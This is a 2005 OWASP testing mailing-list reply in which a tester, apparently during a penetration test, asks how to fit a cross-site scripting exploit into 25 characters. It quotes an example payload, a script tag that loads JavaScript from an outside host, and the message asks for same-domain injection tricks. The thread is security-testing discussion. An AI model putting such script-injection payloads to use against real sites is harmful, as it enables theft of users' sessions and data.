[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Daniel Cuthbert daniel.cuthbert at owasp.org
Thu May 19 07:10:09 EDT 2005


Interestingly, why have they only restricted it to 25 characters and  
where is this being enforced and by what?


On 18 May 2005, at 16:22, Eoin Keary wrote:

> Hi,
> I have a window of 25 chars to perform a XSS exploit.
> anything more is truncated by the server.
>
> <script src=http://a.com/z.js></script>
>
> - this is 39 chars
> We can do HTML injection ("<a href=....") to a degree but anyone  
> any ideas on how to execute script in such a small window (25 chars)?
> we need to stay in the same domain (xyz.com) inorder to make the  
> attack useful. so redirecting to another domain with the "<a  
> href..." is no good.
>
> First correct answer gets a pint of Guinness (Larry S, you're not  
> included for the pint as I owe you too many).
>
> Eoin
>
> _________________________________________________________________
> More features, more fun, still absolutely FREE - get Messsenger  
> 7.0! http://messenger.msn.co.uk
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by Oracle Space Sweepstakes
> Want to be the first software developer in space?
> Enter now for the Oracle Space Sweepstakes!
> http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
> _______________________________________________
> OWASP-Chapters mailing list
> OWASP-Chapters at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>
>





More information about the Owasp-testing mailing list